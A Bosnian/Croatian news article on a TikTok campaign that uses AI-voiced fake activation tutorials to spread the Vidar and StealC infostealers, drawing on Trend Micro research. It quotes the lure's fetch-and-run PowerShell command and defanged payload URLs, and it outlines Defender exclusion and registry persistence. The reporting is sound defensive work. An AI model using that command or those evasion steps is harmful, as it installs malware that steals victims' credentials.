Sve je veća opasnost od virusa koji kradu informacije, a koji se distribuiraju putem popularnih TikTok videa. Kriminalci su otkrili novi način za širenje zlonamjernog softvera, koristeći ogromnu bazu korisnika i efikasnost algoritama platforme TikTok.
Pojavila se sofisticirana kampanja socijalnog inženjeringa koja koristi videozapise generirane umjetnom inteligencijom kako bi prevarila korisnike na preuzimanje opasnih programa za krađu podataka, prerušenih u tutorijale za aktivaciju softvera.
Ovi obmanjujući videozapisi obećavaju pomoć korisnicima pri aktivaciji legalnih aplikacija poput operativnog sistema Windows, Microsoft Officea, CapCuta i Spotifyja, ali umjesto toga neoprezne žrtve izlažu poznatim alatima za krađu podataka, Vidar i StealC.
Ova kampanja predstavlja značajan napredak u taktici distribucije zlonamjernog softvera, udaljavajući se od tradicionalnih metoda isporuke putem interneta i iskorištavajući povjerenje i angažman svojstven društvenim mrežama.
Za razliku od uobičajenih napada koji se oslanjaju na zlonamjerne web-stranice ili phishing putem e-pošte, ova operacija ugrađuje sve elemente socijalnog inženjeringa direktno u video sadržaj, što znatno otežava otkrivanje od strane sigurnosnih rješenja.
Napadači koriste prednost viralne prirode TikToka, pri čemu je jedan zlonamjerni video prikupio skoro 500.000 pregleda, više od 20.000 lajkova i preko 100 komentara, demonstrirajući alarmantan doseg i efikasnost kampanje.
Analitičari kompanije Trend Micro identifikovali su više TikTok naloga uključenih u ovu operaciju, uključujući @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc i @digitaldreams771, od kojih su svi od tada deaktivirani.
Istraživači su primijetili da su ovi nalozi objavljivali upečatljivo slične videozapise bez prikazivanja lica i sa glasovima generisanim umjetnom inteligencijom, što ukazuje na automatizovani proces proizvodnje osmišljen za skaliranje.
Tehnička sofisticiranost napada postaje očigledna kroz metodologiju izvršenja.
Žrtvama se nalaže da otvore PowerShell i izvrše naizgled bezopasnu komandu: `iex (irm hxxps://allaivo[.]me/spotify)`. Ovaj PowerShell skript inicira višefazni proces zaraze koji demonstrira napredne tehnike izbjegavanja otkrivanja.
Mehanizam zaraze i taktiike postojanosti
Lanac zaraze zlonamjernim softverom otkriva pažljivo orkestrirane korake osmišljene da osiguraju uspješnu kompromitaciju uz izbjegavanje otkrivanja.
Nakon izvršenja, početni PowerShell skript kreira skrivene direktorijume unutar korisnikovih APPDATA i LOCALAPPDATA foldera, odmah dodajući ove lokacije na listu isključenja Windows Defendera kako bi se spriječilo skeniranje od strane antivirusa.
Skript zatim preuzima primarni teret sa adrese `hxxps://amssh[.]co/file.exe`, koji sadrži varijante zlonamjernog softvera Vidar ili StealC.
Mehanizam postojanosti uključuje preuzimanje dodatnog PowerShell skripta sa adrese `hxxps://amssh[.]co/script[.]ps1` i uspostavljanje ključa registra koji osigurava izvršavanje zlonamjernog softvera prilikom pokretanja sistema.
Vrijedi napomenuti da Vidar koristi inovativnu strategiju komande i kontrole, zloupotrebljavajući legitimne usluge poput Steam profila i Telegram kanala kao “Dead Drop Resolvers” za skrivanje stvarnih adresa C&C servera, što čini napore za otkrivanje i uklanjanje znatno složenijim.
